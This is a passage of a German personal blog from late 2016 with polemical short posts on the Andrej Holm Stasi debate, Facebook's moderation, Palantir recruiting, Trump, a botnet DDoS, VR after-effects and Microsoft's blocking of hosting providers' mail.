Erstmal die Fakten. Holm hat selbst erzählt, dass er nach der Schule eine Karriere in der Stasi angestrebt hat. Daher hat er seinen Wehrdienst im September 1989 beim Stasi-Wachregiment "Feliks Dzierzynski" angetreten. Kurz danach brach die DDR zusammen.
Man kann jetzt sagen: Dieses Wachregiment ist schon Teil der Stasi-Karriere, also können wir Andrej Holm Stasi-Vorwürfe machen.
Oder man kann sagen: Das war Wehrdienst, den musste jeder machen.
Meine Freunde aus dem Osten haben mir jetzt erzählt, dass dieses Wachregiment aus auch Nicht-Stasi-Gründen sehr attraktiv war, weil man da a) nicht durch den Schlamm robben musste und b) in der Nähe von Berlin stationiert war und seine Freundin besuchen konnte.
Das aber nur als Bewertungskontext. Holm hat angesagt, dass er das für eine angestrebte Stasi-Karriere gemacht hat.
Für mich ist aber der entscheidende Punkt, dass er nicht bei der Stasi angefangen hat. Das lag nicht an ihm sondern am Zusammenbruch der DDR. Aber für Intentionen, die nicht ausgeführt werden, wird in meinem Weltbild niemand bestraft. Nur mal so als Gedankenexperiment. Jemand strebt eine Stasikarriere an, aber hat dann einen Autounfall. Kann man sich ja einmal so vorstellen, dass er eine alte Oma überfährt und in den Knast kommt, und einmal so, dass er angefahren wird uns im Krankenhaus im künstlichen Koma liegt. Jedenfalls kommt es nicht zur Stasikarriere. Würden wir demjenigen dann Vorwürfe wegen der abgestrebten Stasikarriere machen?
Oder andersherum. Was wenn Andrej uns jetzt angelogen hätte, dass er gar nicht zur Stasi wollte, aber er nur zu diesem Wachregiment gegangen ist, weil er seine Freundin in Berlin besuchen können wollte? Sollten wir das jetzt bestrafen, dass jemand seine Geschichte ehrlich aufarbeitet und uns nicht ins Gesicht lügt wie alle anderen?
Mir fehlt wie gesagt der Kontext für eine sichere Bewertung, aber aus meiner Sicht gibt es hier keine Faktenbasis für Stasi-Vorwürfe. Da muss man sich echt die Dinge zurechtlegen, um überhaupt einen Vorwurf konstruieren zu können.
Man kann Andrej Holm Gesinnungsvorwürfe machen. Man kann sagen: Jemand, der freiwillig zur Stasi wollte, ist als Staatssekretär in einer Demokratie unakzeptabel. Das kann man sagen, aber ich halte das für gefährlich. Denn damit spricht man Menschen die Fähigkeit ab, Fehler einzusehen und zu korrigieren. Bei Straftätern haben wir dieses Recht verankert, dass einem nicht wegen einer Straftat in der Jugend das ganze Leben zerstört wird. Und Andrej hat nicht mal eine Straftat begangen hier. Und wir sind ja auch am rechten Rand für Resozialisierung. Bei Faschisten verzeihen wir schlechte Gesinnung, aber bei jemanden, der sie nie ausgelebt hat, nicht?! Sorry, das kann ich nicht akzeptieren.
Und weil ich nach diesen Überlegungen fand, dass die Vorwürfe gegen Holm einem Internetpranger gleichkommen, habe ich mich bisher nicht geäußert. Und tu es auch jetzt nur sehr widerwillig, weil ich so viele Zuschriften dazu gekriegt habe. Weil also die Vorwürfe bereits so breit verbreitet sind, dass ich das (hoffentlich) nicht schlimmer mache, wenn ich da jetzt auch noch mal was zu sage.
Aber aus meiner Sicht haben sich in dieser Debatte alle Ankläger nicht mit Ruhm bekleckert.
Update: Die Frage ist, welches Kriterium man anlegen sollte. Ab wann ist jemand lebenslang für öffentliche Ämter vergiftet? Frank schlägt vor: „hat über Andere verdeckt berichtet oder dazu direkt beigetragen“
Update: Die Stasi hat sich übrigens im Inland als Korruptionsbekämpfer dargestellt. Du willst etwas gegen Vetternwirtschaft und Korruption unternehmen? Dann komm zur Stasi! Und was man ja im Westen nicht für möglich gehalten hätte: Es gab da wohl durchaus Bevölkerungsteile, die nie die negativen Aspekte der Stasi erlebt haben, und die auf diese PR reingefallen sind.
Update: Ein Einsender kommentiert:
Als WR-Soldat war man ganz offiziell "Angehöriger des Ministeriums für Staatssicherheit" und hat das auch (mehr oder weniger freiwillig) so unterschrieben. Aus diesem Grund gelten die "Dzierzynskis" heute auch de jure als MfS-Mitarbeiter. Man kann jetzt daraus trotzdem keine bedingungslose Unterstützung für das SED-Regime konstruieren. Einige taten dies z. B. auch, um die Chancen auf einen Studienplatz zu erhöhen, oder weil sie Angst hatten, eine Absage könne für sie oder die Familie nachteilige Folgen haben. Nur scheint dies alles bei Holm nicht der Fall gewesen zu sein. Er wollte nach eigener Aussage Karriere beim MfS machen. Muss jetzt jeder selbst für sich bewerten, wie man das finden soll.
Update: Ein Einsender ("Sicht eines fast Gleichaltrigen, ebenfalls Ostberlin") dazu:
Aus meiner Schule (Ost-Berlin) sind die allerschärfsten Gestalten zum Wachregiment "Feliks Dzierzynski".
Das alleine wäre für mich NIEMALS ein alleiniges Kriterium, um jemanden politisch einzuschätzen. Dafür waren die vom normalen Stasi-Dienstbetrieb auch noch zu weit weg. Halt Wachesteher, Wehrdienstleistende usw.
Die Sprachregelung unter uns Jugendlichen war auch nicht: Der und der geht zur Stasi, sondern der und der geht zu Dzierzynski.
Und noch was anderes muss man beachten: Bei denen gab es wie bei der NVA auch eine EK-Bewegung und ganz ähnliche Stimmungen, was ja auch mit dem Alter zusammenhängt. Ein Kumpel, der da 3 Jahre war, hat erzählt, dass die allgemeine Stimmung dort genauso wie bei der NVA war: Schon nach kurzer Zeit hassten die meisten die Stasi, so wie wir die NVA hassten. Einfach weil man täglich schikaniert wurde, geschliffen, der Willkür ausgesetzt. Kasernenbetrieb! Aber mein Kumpel hat auch gesagt, dass es dort genauso auch heiße Typen gab, so Funktionärssöhnchen, ganz stramme, wo man besser nicht zu viel gucken ließ.
Aber summa summarum: Kein Urteil ohne konkreten Blick auf den Typen selbst. Es stimmt, was du geschrieben hast: Boha, bei Dzierzynski kann man in Berlin sein! Alleine das war für viele ein Grund.
Und weißt Du, warum ich als Berliner nicht zu Dzierzynski gegangen bin? Weil ich da trotz 3 Jahren Wehrdienst bloß Soldat statt Unteroffizier gewesen wäre. Ich bin doch nicht bescheuert, hatte ich da gedacht, wenigstens will ich nicht der Allerunterste im Dreck sein. Genau aus dem gleichen Grund bin ich nicht zur Marine. Beides hat absolut gleichwertig nebeneinander gestanden für mich.
Wir waren halt Jugendliche. Berliner. Großschnauzen, aber keine philosophisch begründeten Regimegegner. Der Film Sonnenallee bringt ein korrekteres DDR-Stimmungsbild, als die meiste Literatur zum Thema. Ist einfach so.
Update: Oh und ich bitte, zum Vergleich auch mal zu den Nazi-Aufarbeitungen zu gucken, die im Westen so liefen. Der BND, das BKA, das Justizministerium. Nazis waren bei uns nie ein Problem, auch auf Entscheiderposten. Googelt nur mal Hans Globke. Aber hier machen wir jetzt ein Fass auf?

Thu Dec 8 2016

[l] Welcher Vollpfosten fand das noch gleich eine gute Idee, die Zensur politisch unerwünschter Inhalte an privatwirtschaftliche Firmen outzusourcen?
Nun, wenn man das macht, dann passiert sowas hier.
"Titanic"-Chefredakteur von Facebook gesperrt
JA SUPER, liebe Freunde der Zensur! Hier ist, was der Stein des Anstoßes war:
Wolff hatte auf seinem Foto mehrere Seiten der "Bild" so arrangiert, dass die Schlagzeile "Die große Debatte um das Frauenbild von Flüchtlingen!" vom 7. Dezember zu sehen ist - und gleichzeitig reichlich Fotos von nackten oder dürftig bekleideten Frauen, die in der "Bild" erschienen sind. Das Foto postete er gestern auf seiner privaten Facebook-Seite. Kurz darauf schob er nach: "Wenn Facebook den Post jetzt noch löscht, weil darin eine nackte Frauenbrust zu sehen ist, dann ist die Idiotie des Sexismus komplett abgebildet."
Mit Ansage hat sich Facebook zum Stück Brot gemacht! Mit Ansage!!
Danke, Herr Maas. Das ist Ihre Schuld. Sie haben die Idee, dass Facebook irgendwelche Inhalte zensieren … nicht nur darf sondern soll, diese Idee haben Sie befördert. Sie sollten sich was schämen.
Tolle Rosa-Wattebäuschchen-Welt, in die ihr euch da gemeinsam zum selbst-infantilisieren hineinhalluziniert. Ist ja auch viel schöner, wenn man sich selbst zum passiven Möbelstück macht. Wer nie etwas schlimmes sieht, der steht auch nie unter Handlungsdruck, Dinge zu verhindern oder zu verbessern. Und es ist ja auch so viel einfacher, sich in virtuellen Windeln in die virtuelle Plüschecke zu setzen und sich mit den anderen Stehpflanzen dort gegenseitig anzuflauschen.
Dieser Spiegel-Artikel wird übrigens immer absurder, je weiter man runterscrollt.

Wed Dec 7 2016

[l] Palantir führt gerade in Deutschland an den Unis Rekrutierungsversuche durch. Was Palantir macht, hatte ich hier mal am Rande erklärt. Wer also eh kein Gewissen hat, und schon immer mal dem US-Militär beim Drohnenmorden helfen wollte, oder den Geheimdiensten beim Auswerten ihrer Massenüberwachungsdaten, der kann sich ja mal den Flyer ansehen, den sie an der Uni Potsdam verteilt haben.
Falls jemand hingeht und mal berichten will, was die da zu ihrer Verteidigung vorzubringen haben, bitte ich um einen Bericht.
Das Selbstbild, das sie da von sich pflegen, sieht jedenfalls stark nach "24" aus. Wir retten die Welt!1!!
Update: Einsender schreiben, dass Palantir auch beim Bundeswettbewerb Informatik letztes Jahr Recruiting gemacht hat, und bei der NIPS (Konferenz zum Machine Learning, wo die Recruiter auch aller möglicher anderer Firmen sich alle gegenseitig die Klinke in die Hand geben und ihnen die Geldscheine nur so aus den Hosentaschen quellen).

Tue Dec 6 2016

[l] Neues von der Musikindustrie: Letzte Woche hat Vinyl mehr Umsatz gemacht als Downloads (in UK)

Sun Dec 4 2016

[l] Alternativlos Folge 38 ist draußen.
Weil wir den armen Erdgeist letztes Mal mit unseren Essensgeräuschen so verärgert haben, und weil der eh gerade stark im Stress ist mit 33c3-Vorbereitungen und so weiter, habe diesmal wieder ich das Audio gemacht, und der Qualitätsunterschied wird euch helfen, seine Arbeit das nächste Mal angemessen zu würdigen :-)
Inhaltlich geht es um die Post-Trump, Post-Brexit, Post-Flüchtlingskrise-Welt und die Krisen, die noch nicht Post-Irgendwas sind, was sich halt gerade so latent Trump-beeinflusst anfühlt in Europe, d.h. die Wahlen in Österreich und Frankreich und die Brexit-Nachwehen in UK. Ist das die Apokalypse? Wie gehen es jetzt weiter?
Die Umfrage nach der letzten Folge war sehr deutlich, dass ihr lieber Stammtischfolgen als gelangweiltes Rumwarten auf Folgen mit Gästen haben wollt, und so ist das jetzt auch wieder eine gastlose Stammtischfolge geworden.
Wir reden aber auch ein bisschen über Surkov, Fake News, die Digitale Charta (an der Frank ein bisschen mitgearbeitet hat), und am Rande auch über die OPEC. Wir wünschen viel Spaß beim Hören!

Fri Dec 2 2016

[l] Endlich darf das FBI weltweit hacken! Gut, haben sie auch vorher schon gemacht, beispielsweise im Krieg gegen Tor.

Thu Dec 1 2016

[l] Habt ihr das auch gehört? Berliner Straßenbahnfahrer schmeißt muslimisches Mädchen wegen ihres Kopftuchs raus?
Hier ist, was wirklich passierte.
Und hier ist, was RT daraus gemacht hat.
Schöne Medienkompetenzübung!
[l] Trudeau genehmigt eine fiese Umweltvernichtungspipeline für Teersandöl aus Alberta einmal über die Rocky Mountains nach Vancouver, und dort auch gleich noch einen Hafenausbau. Begründung:
"Kein Land der Welt würde Millionen Barrels im Boden lassen, so lange es noch einen Markt dafür gibt", sagte er.
So und jetzt achtet mal bitte darauf, wie die Tagesschau mit Trudeau umgeht. Ich hatte das ja in Alternativlos 37 kurz angesprochen, wenn ich mich Recht entsinne, dass Trudeau so eine Lichtfigur ist. Der sieht gut aus, hat sein Kabinett genau zur Hälfte mit Frauen bestückt, hat ein paar Mal Virtue Signalling gemacht und jetzt glaubt alle Welt, der sei halt einer der Guten. Und der macht jetzt sowas. Das erzeugt eine Kollision zwischen dem Weltbild ("Trudeau ist ein Guter") und der Realität ("Trudeau betreibt aktive Umweltvernichtung"). Ich finde es auffallend, wie sich der Tagesschau-Artikel bemüht, Trudeau nicht zu kritisieren. Achtet mal darauf, ob ihr das auch so empfindet. Da hat sich jemand noch nicht von seinem "der Trudeau ist aber ein Guter"-Weltbild lösen können, selbst als er den Gegenbeweis als Meldung auf dem Tisch hatte.

Fri Nov 25 2016

[l] Aus Zentralamerika hat sich gerade eine Welle aus Menschen in Richtung USA auf den Weg gemacht, die die USA gerne erreichen wollen, bevor Trump offiziell eingeschworen wird. :-)

Tue Nov 22 2016

[l] Trump hat ein klärendes Meeting mit den Medienbossen des Landes gemacht. Ihr wisst schon, die, die alle gegen ihn gewettert hatten. Die seine Anhänger beschimpft hatten.
Man muss kein Nostradamus sein, um sich auszumalen, dass das kein reines Freudenfest war.
Und tatsächlich beschreibt es einer der Anwesenden so:
“It was like a f---ing firing squad,” one source said of the meeting. "Trump started with [CNN President] Jeff Zucker and said, ‘I hate your network, everyone at CNN is a liar and you should be ashamed.’"
HARR HARR
Update: Schön ätzender Rant von Glenn Greenwald über das Meeting.
[l] Vor ein paar Tagen ging diese Geschichte hier rum, wo ein Programmierer mal sein Gewissen erleichtert. Er erzählt, dass er in seiner "ich war jung, ich brauchte das Geld"-Phase für eine Pharmafirma über Bande ein Medikament an junge Frauen gepusht hat. Direkte Werbung war verboten, also haben sie eine "unabhängige" "neutrale" Beratungs-Webseite gemacht, mit so einem Fragebogen, und egal was du da ankreuzt, am Ende kommt immer raus, dass du dieses Medikament brauchst. Und er hat erst sein Gewissen entdeckt, als seine Schwester anfangen sollte, dieses Medikament zu nehmen, und vorher eine andere junge Frau anscheinend von diesem Medikament in den Selbstmord getrieben wurde.
Dieser Text macht gerade die große Runde und alle möglichen Programmierer lüften da mal ihr Gewissen.
Und wisst ihr was? Ich habe nie etwas gemacht, das mir später peinlich oder unangenehm gewesen sein müsste. Ich war auch jung, ich brauchte auch das Geld. Aber die Grenze habe ich nie gekreuzt. Und ich habe mir über die Jahre einige Male einige Male Augenrollen abholen müssen, und so ein "naja ist ja dein Leben, entscheide du mal wie du meinst *abwink*".
Ich habe so eine moralisch klare Linie auch immer anderen Menschen empfohlen, und da kommt dann häufig so ein "na du musst ja krass privilegiert sein, dass du dir leisten kannst, Aufträge nicht anzunehmen". Das kann schon sein. Man wird immer Leute finden können, die weniger privilegiert sind als ich. Aber hatte ich hier immer ein leichtes Leben, nie Sorgen, die Heizung oder Lebensmittel nächsten Monat noch zahlen zu können? Nein. Ich habe nie hungern müssen, auch wenn es ein paar Mal so aussah, als könnte es knapp werden. Ich glaube, diese Dichotomie von "jeden Scheißjob annehmen oder sonst hungern müssen" gibt es so nicht. Man kann auch sein Gewissen behalten und trotzdem nicht kriminell werden oder moralisch verwerfliche Dinge tun.
Nicht nur kann man auch überleben, wenn man Scheißjobs ablehnt. Die Leute, die die Scheißjobs "notgedrungen" annehmen, denen geht es am Ende auch nicht besser. Ob sich ein Leben "gut" anfühlt oder nicht, ob man mit seinen Umständen zufrieden ist, das hängt ja auch nicht nur davon ab, wieviel Geld man zur Verfügung hat, sondern ob man sich an Luxus gewöhnt hat, den man sich jetzt nicht mehr leisten kann. Das ist meiner Erfahrung nach der größte Quell an Unzufriedenheit auf diesem Planeten. Wenn man das Gefühl hat, es ging einem schon mal besser, und jetzt muss man sich einschränken. Daher ist meiner Ansicht nach das Geheimnis zu einem guten Leben, dass man sich keinen Luxus leistet, außer man weiß wirklich sicher, dass man dieses Niveau auch in Zukunft wird halten können. Damit bin ich immer gut gefahren.
Lange Rede, kurzer Sinn: Der Druck, Scheißjobs anzunehmen, kommt im Allgemeinen nicht vom Leben, sondern von euch selbst. Man kann so gut wie immer Nein sagen. Die Idee, man muss das jetzt machen, sonst ist man morgen pleite, das ist bloß eine Drohkulisse, die man aus Rechtfertigungsdruck sich selbst gegenüber aufbaut. Lernt, das zu ignorieren.
Update: Hmm, das war jetzt vielleicht zu krass formuliert. Es gibt sicher Einzelfälle, in denen man wirklich mit dem Rücken zur Wand steht, und von irgendwo dringend Geld braucht. So "entweder dass oder ich muss ne Bank ausrauben, um die Not-OP meiner Tochter bezahlen zu können". Wer in so einer Situation ist, ist für unmoralische Angebote zugänglicher, klar. Auf der anderen Seite kommen solche Situationen meiner Beobachtung nach im Allgemeinen daher, dass man über seine Verhältnisse gelebt hat, dass man falsche Entscheidungen getroffen hat, dass man finanzielle Verpflichtungen auf sich genommen hat, die man nicht erfüllen konnte. Damit wären wir wieder bei meinem Punkt von weiter oben, dass man sich nur Luxus gönnen sollte, wenn man ganz sicher ist, ihn sich auch langfristig leisten zu können. Und mit "sicher" meine ich jetzt nicht "das wird schon werden, ich bin ja so genial und finde schon nen Job".

Mon Nov 21 2016

[l] Was tut man mit Leuten, die in Wuppertal mit selbstgemachten Uniformen mit der Aufschrift "SHARIAH POLICE" rumlaufen?
Die "Uniformen" sahen nicht mal annähernd wie tatsächliche Polizeiuniformen aus, von Verwechslungsgefahr kann keine Rede sein. Dennoch ist das anscheinend das Einzige, was man denen juristisch vorwerfen konnte. Und von dem Vorwurf des Verstoßes gegen das Uniformverbots wurden sie jetzt freigesprochen.
[l] An dem DDoS neulich, der weite Teile des nordamerikanischen Internets unerreichbar gemacht hatte, war Sony Schuld :-)
Der Gamer hegte demnach einen persönlichen Groll auf den von Sony betriebenen Dienst für dessen internetfähige Spiele-Konsole PlayStation. Er habe sich für seinen Angriff ein Bot-Netz von rund 150.000 internetfähigen Geräten für einen Zeitraum "gemietet", darunter auch Kameras, Glühbirnen und Haushaltsgeräte.
Wenn Sony ordentliche Produkte anbieten würde, hätte sie dieser Depp nicht DDoSsen wollen, und dann wäre das Internet an dem Tag auch nicht zusammengebrochen.

Sun Nov 20 2016

[l] Wenn ihr noch ein Stündchen oder zwei vom Wochenende Zeit habt, dann lest euch mal diesen Artikel in der New York Times durch. Der fängt ein bisschen schwächlich an, liest sich wie eine Packung Hurrapatriotismus von einem Ami für andere Amis. Aber es wird besser. Lasst euch auch nicht von der Wahlanalyse abschrecken, die auf den ersten Blick langweilig wirkt. Der meines Erachtens wichtige Teil beginnt bei "But the fixation". Der Teil lohnt es sich sogar zweimal zu lesen, damit man ihn wirklich versteht.
Ging mir jedenfalls so, denn dieses ganze Konzept der "Identitäten" ist mir ziemlich fremd. Wer die ganze Zeit über sich und seine Identität nachdenkt, der hat nie Zeit, Empathie zu entwickeln. Für mich ist Identität eher ein Konzept aus der Computersicherheit, wenn es um Einloggen geht :-)
Wenn ich eine Stelle zitieren sollte, wäre es diese hier:
Identity politics, by contrast, is largely expressive, not persuasive. Which is why it never wins elections — but can lose them.
Er beschreibt da den Blick eines Amerikaners, der ein Jahr Sabbatical in Frankreich gemacht hat, und in der Zeit keine US-Medien konsumiert hat, als er zurück nach Hause kommt, mit geschärftem Blick.
Liberals should bear in mind that the first identity movement in American politics was the Ku Klux Klan, which still exists. Those who play the identity game should be prepared to lose it.

Sat Nov 19 2016

[l] Dieser Trump ist echt schlauer als er auf den ersten Blick wirkt. Jetzt hat er nahtlos das Konzept "Safe Space" übernommen, um damit seine Gegner mundtot zu machen.
Hätte uns doch nur vorher jemand gewarnt, dass das mit den Safe Spaces eine bekloppte Idee ist!1!!
Ich komme mir langsam vor wie in einem Film mit Jeff Goldblum.
Wenn ihr übrigens mal sehen wollt, was Trump hier als "Safe Space"-Verletzung darstellt: Die New York Times hat ein kurzes Filmchen. Ich kann da keine Beleidigung erkennen. Genau wie bei herkömmlichen "Safe Space-Verletzungen"! Oh das muss ja schmerzen, wie der Trump nicht mal euer Konzept pervertiert oder übertreibt oder so, sondern einfach nur so anwendet, wie ihr es vorgemacht habt.

Thu Nov 17 2016

[l] Wenn ihr dafür Geld bekämt, wie oft würdet ihr dann die selbe Pfandflasche immer wieder in einen manipulierten Pfandautomaten stecken?
Der Rekord liegt bei 180.000 Mal, und damit hat sich der Mann knapp 45.000 € ergaunert.
"Das ist ja schon logistisch eine Meisterleistung", zitiert der "Kölner Stadt-Anzeiger" den Richter aus dem Prozess. "Da haben Sie ja den ganzen Tag nichts anderes gemacht, als den Automaten zu bedienen." Darauf habe der Angeklagte geantwortet: "Ich habe ein Radio danebengestellt, weil es mir sonst zu langweilig war."
Leider sagen sie nicht, wie lange er da gesteckt hat, um die 180.000 Mal zusammen zu kriegen.

Tue Nov 15 2016

[l] An mir scrollt gerade diese Beschreibung von Post-VR-Symptomen vorbei. Da beschreibt jemand, dass er nach einer VR-Sitzung erst ein Gefühl der physischen Entfremdung hat, weil er das Gefühl hat, er greift durch physischen Gegenstände hindurch.
Das legt sich nach ner halben Stunde, aber dann hat er eine Art … er nennt es Traurigkeit, eine Art Mini-Depression.
Und DAS finde ich ausgesprochen faszinierend. Er beschreibt da nämlich, wie sich die Farben außerhalb der VR weniger lebendig anfühlen (weil man im Computer natürlich eine idealisierte Welt hat, mit viel saturierteren Farben als im echten Leben und so weiter).
Aber was mich daran fasziniert, ist … ich habe Neuromancer von William Gibson gelesen. Und ich habe Shadowrun gespielt. Dort wird VR als eine Art Internet der Zukunft beschreiben. Es ist überall verfügbar, man kann sich einklinken, und dann gibt es natürlich Pornos und Drogen dafür. Hier gehen in der Science Fiction die Szenarien auseinander, aber was es in vielen Zukunftsvisionen gab ist so eine Beschreibung der Sucht. Wenn es nicht das Einklinken in den Cyberspace selbst ist, das die Sucht auslöst, dann irgendwelche Erinnerungen anderer Menschen, stimulierende Gefühle, die von irgendwelche Simulationen ausgelöst werden, oder sonst was in die Richtung.
Ich fand immer das Bild faszinierend, das in Shadowrun (oder auch dem tollen Film "Strange Days") die physische Welt fast als zerfallende Ruine beschrieben wird, und es drängt sich so ein bisschen der Eindruck auf, dass niemand Bock hat, in die Realität zu investieren, wenn man auch in das virtuelle Glück investieren kann.
Jedenfalls, warum ich das alles blogge: Wenn ich die Beschreibung mit den intensiveren Farben lese, dann klingt das für mich genau so, wie ich mir VR-"Entzug" in diesen Scifi-Szenarien immer ausgemalt habe.
Und das ist ein Meilenstein, der mich jetzt kalt erwischt. Was ich bisher von VR gehört habe, ist das eher so ein Spielzeug, überhaupt nicht ausgereift, da spielt man ein Stündchen mit rum und dann legt man es wieder weg, weil es keine Tiefe hat, nicht interessant ist. Und trotzdem haben wir das schon erreicht, dass Leute eine Art VR-Entzug spüren?
Krass.
[l] Einer der dedizierten Server meiner Firma steht bei Hetzner.
Von dort aus wollte ich jetzt eine E-Mail an jemanden bei live.com schicken. Die hat deren Mailserver direkt abgelehnt, weil anscheinend Hetzners IP-Range bei denen abgewiesen wird. Ich weiß mit Sicherheit (und wir haben diese IP schon über ein Jahr), dass von dort aus noch nie ein Spam oder Newsletter oder Kaltacquise oder irgendwas auch nur entfernt nach Spam Riechendes rausging. Und letztes Jahr ging Mail an live.com noch. Daher meine Schlussfolgerung, dass die Blockage ganze Subnetze bei Hetzner betrifft, wenn nicht gar den ganzen Laden.
Aber deshalb blogge ich das nicht. Ich blogge das, weil ich ein Ticket bei Hetzner aufgemacht habe. Und als Antwort kam, ich (!) solle mich doch bitte persönlich in einen Dialog mit Microsoft (!!) begeben, um für meine IP bei denen eine Ausnahmeregelung auszuhandeln.
Lange habe ich mich nicht mehr über etwas so aufgeregt. Die externalisieren schlicht die Aufräumkosten für ihre nicht existierende Spamverhinderung an ihre nicht spammenden Kunden. Was für eine Frechheit.
Hey, soll ich auch gleich noch den Fußboden auskehren und das Klopapier wechseln?
Boah da krieg ich echt Blutdruck bei sowas. Ich guck mich mal nach anderen Hostern um. Unglaublich.
Update: Ein Einsender meint, ihm sei das auch schon mal bei 1&1 passiert. Er und andere meinen, das sei wohl Microsofts Schuld dann, und wer da seine Mail hostet, der will halt nicht kontaktiert werden :)
Update: Ein anderer Einsender hatte das selbe Problem bei Strato, und noch jemand anderes bei netcup. Wir haben jetzt zwei Möglichkeiten. Die ISPs sind alle kacke, oder Microsoft dreht frei. Occam's Razor sieht nicht gut aus für Microsoft.
Update: Ein Einsender teilt folgende Geschichte mit uns:
bez. Mail an live kann ich nur raten Dich nicht aufzuregen. Wir sind eine Hochschule, sind im Landesnetzwerk von Baden-Württemberg, signieren alle Mails (soweit ich das sehe) mit einer ordentlichen DKIM-Signatur und hatten Probleme mit Live und mit allen Benutzern von Barracuda-Antispamdingern.
Barracuda war immerhin so nett nach 4 Tagen eine Antwort zu senden daß die Mail nicht zugestellt wird (einer der Barracudabenutzer war eine Bank ... 4 Tage später habe ich erfahren, daß die Mail nicht ankam .. *grrr*)
Bei Live wurde die Mail einfach weggefiltert. Kein Hinweis an den Empfänger, kein Hinweis an den Absender. Hat richtig gekracht da deshalb viele Studienbewerber aus dem Ausland Ihre Immatrikulationsunterlagen nicht rechtzeitig bzw. gar nicht bekommen haben ...
Reagiert hat Microsoft Null. Weder auf Mail, noch Webformkontakt noch Fax noch Brief. Erst als ich ALLE mails von Live pauschal abgelehnt habe und im Errorcode einen Link auf unsere Homepage eingebaut habe auf eine Seite mit Microsoft Kontaktdaten und der Bitte der Livekunde möge sich beschweren kam Bewegung in die Sache .....
Au weia.

Sun Nov 13 2016

[l] Der Trump hat ja in den Wochen und Monaten vor der Wahl eine sehr dünne Haut gezeigt, wenn es um Kritik an seiner Person geht.
Hat sich eigentlich mal jemand überlegt, was passiert, wenn der Trump jetzt voll auf den Hatespeech-Zug aufspringt? Und die alle der Reihe nach in den Knast tut, die ihn kritisiert haben?
Ich meine das jetzt im Erdogan-Sinne, nicht im Stalin-Sinne. Erdogan hat ja auch ein bemerkenswertes Fingerspitzengefühl dafür gezeigt, nur die Leute wegzukloppen, bei denen sich das formaljuristisch irgendwie begründen oder herleiten lässt. In der Türkei werden ja keine Passanten auf der Straße erschossen.
Was wenn der Trump das jetzt auch macht. Der nimmt sich irgendeine der debilen Hatespeech-Definitionen, wo es das Tatmerkmal die Traumatisierung des Opfers ist, und wendet das auf sich an.
MANN ist dem übel mitgespielt worden in dem Wahlkampf. Das Mem mit den kleinen Händen, die Statue mit dem fetten nackten Trump mit Schrumpfpenis in New York, all der Hass, den die Linke über ihm ausgebreitet hat. Wenn das mal so richtig verfolgt würde, und zwar rechtstaatlich verfolgt, nicht arbiträre Tribunale, so richtig mit ordentlichem Hatespeech-Gesetz und dann der Reihe nach wegknasten, die Clinton-Anhänger. Es ist ja kein Zufall, das zu Trumps Wahlsieg sofort der Aktienkurs der Privat-Gefängnis-Firmen hochschnellte.
Ich habe vor dem Szenario die ganze Zeit gewarnt, dass jemand eure Hatespeech-Gesetzesvorschläge gegen euch anwenden wird. Und jetzt, muss ich sagen, würde ich das wirklich gerne mal als Gedankenexperiment für einen TV-Film oder so sehen. Ich glaube, dass die meisten Hatespeech-Verfolgungs-Verfechter immer noch nicht verstanden haben, was für ein Fass ohne Boden sie da aufgemacht haben.
[l] Faszinierend. Eine erschütternd große Gruppe von Berufs-Internet-Opferdarstellern reagiert gerade auf den Trump-Sieg, indem sie … sich noch doller in ihrer Opferrolle suhlen. Bei allem Verständnis für ein-zwei Tage Heulen und Zähneknirschen: Es reicht.
Erstens: Polizei und Geheimdienste fahren jetzt schon alle Befugnisse so hart am Rande der Legalität, dass sie alle Nase lang ertappt werden und zurückrudern müssen. Auch unter Rechtspopulisten ist da kein großer Ermessensspielraum mehr, um noch knapper an der Illegalität Platz zu nehmen.
Zweitens: Das Justizsystem hat sich an die Gesetze zu halten. Die kann Trump nicht ändern. Das selbe gilt für die AfD oder Le Pen oder Wilders. Das müsste durchs Parlament, da könnte man mit Massenprotesten also was reißen (siehe Polen und das Abtreibungsverbot da neulich). Und wenn das nicht klappt, hat man immer noch das Verfassungsgericht oder vergleichbare Institutionen in anderen Ländern.
Was will ich damit sagen?
Ich will damit sagen: Wenn ich jetzt laut rumheule und mich als Opfer geriere, dann nicht weil ich Angst vor den tatsächlich illegalen und klar verwerflichen Dingen habe, die der Staat jetzt unter Trump/AfD/whatever tun könnte. Sondern aus Angst vor den nicht klar illegalen und verwerflichen Dingen. Die Dinge, die ich Scheiße finde, aber die die Mehrheit eben nicht Scheiße genug findet, um sie im Zweifelsfall zu verhindern.
Die Leute, die das tun, können mir mal gepflegt den Buckel runterrutschen.
Das Opfergetue im Moment ist aus meiner Sicht völlig illegitim. Insbesondere in den USA. Es gab eine Wahl, die Wahlbeteiligung war 50%. Ja, die GOP haben Wahlbetrug gemacht, das lasse ich gelten, das kann möglicherweise so um die 5% der Stimmen betroffen haben. 5% reicht, um den Trump-Sieg zu erklären — aber nur, weil die Hälfte nicht wählen gegangen ist!
Die Tage scrollte eine Grafik an mir vorbei, welche Bevölkerungsschichten Trump gewählt haben. Die Weißen. Nur die Weißen. Alle anderen haben mehrheitlich gegen Trump gestimmt. Und selbst die Weißen haben nur so mit 60 zu 40% für Trump gestimmt. Wie konnte der also trotzdem gewinnen? Weil die anderen alle nicht wählen gegangen sind.
Sorry, ich habe null Mitleid mit Leuten, die nicht wählen gehen, und dann entsetzt sind. Oh und übrigens haben zwar die Mehrheiten der Nicht-Weißen für Hillary gestimmt, aber bei weitem nicht alle. Hier hat keine Übernahme des wütenden weißen Mannes stattgefunden. Die anderen haben auch millionenfach für Trump gestimmt. Insbesondere übrigens die weißen Frauen. Ich kann da ein Muster erkennen. Untersuchungen haben gezeigt, dass am Arbeitsplatz Frauen weniger von den Männern als vielmehr von anderen Frauen zurückgehalten und am härtesten kritisiert werden. Ich glaube, dass das auch mit Hillary passiert ist. "Ja klar will ich ne Frau als Präsident, aber doch nicht DIE!1!! Das könnte ICH ja besser!!1!" Männer sind da kompromissfähiger mit ihren Konkurrenten und weniger nachtragend bei ihren Widersachern.
So jedenfalls hab ich das jetzt ein paar Mal in Studien gesehen. Kann auch sein, dass sich die alle irren und es eine andere Erklärung gibt. Was weiß ich schon. An den Fakten, dass die weißen Frauen Trump gewählt haben, geht aber kein Weg vorbei.
So und jetzt hört bitte endlich mit dem Gewinsel auf. Eure Safe Spaces, eure genderneutralen Toiletten, eure Gender-Sprachumstellung, … das war alles nicht mehrheitsfähig. Das liegt nicht daran, dass die Mehrheit nicht progressiv ist. Die Mehrheit war für Homoehe und Marijuana-Legalisierung und hat einen Schwarzen zum Präsidenten gewählt — zweimal!
